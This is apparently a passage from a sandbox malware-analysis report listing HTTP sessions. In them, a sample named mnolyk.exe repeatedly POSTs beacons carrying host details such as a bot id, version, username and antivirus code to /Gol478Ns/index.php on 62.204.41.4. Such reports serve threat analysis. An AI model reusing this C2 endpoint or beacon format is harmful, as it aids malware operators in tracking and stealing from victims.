                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:26.744736910 CET698INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          544192.168.2.65026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:26.932435036 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:26.995754957 CET699INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          545192.168.2.65027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:27.172190905 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:27.237406015 CET700INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          546192.168.2.65027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:27.422593117 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:27.485740900 CET701INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          547192.168.2.65027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:27.657285929 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:27.720596075 CET702INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          548192.168.2.65027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:27.900257111 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:27.968347073 CET703INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          549192.168.2.65027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:28.142137051 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:28.208792925 CET704INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          55192.168.2.64977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:04.281618118 CET168OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:04.345859051 CET168INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          550192.168.2.65027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:28.403496027 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:28.467736006 CET705INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          551192.168.2.65027662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:28.648273945 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:28.713113070 CET706INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          552192.168.2.65027762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:28.892621040 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:28.957741976 CET707INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          553192.168.2.65027862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:29.144512892 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:29.212220907 CET708INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          554192.168.2.65027962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:29.390955925 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:29.456379890 CET709INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          555192.168.2.65028062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:29.633131027 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:29.698019981 CET710INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          556192.168.2.65028162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:29.880685091 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:29.945671082 CET711INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          557192.168.2.65028262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:30.132021904 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:30.197393894 CET712INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          558192.168.2.65028362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:30.376799107 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:30.440956116 CET713INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          559192.168.2.65028462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:30.624650955 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:30.689337015 CET714INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          56192.168.2.64977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:04.516284943 CET169OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:04.580698013 CET169INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          560192.168.2.65028562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:30.859757900 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:30.922893047 CET715INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          561192.168.2.65028662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:31.095392942 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:31.160752058 CET716INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          562192.168.2.65028762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:31.342736959 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
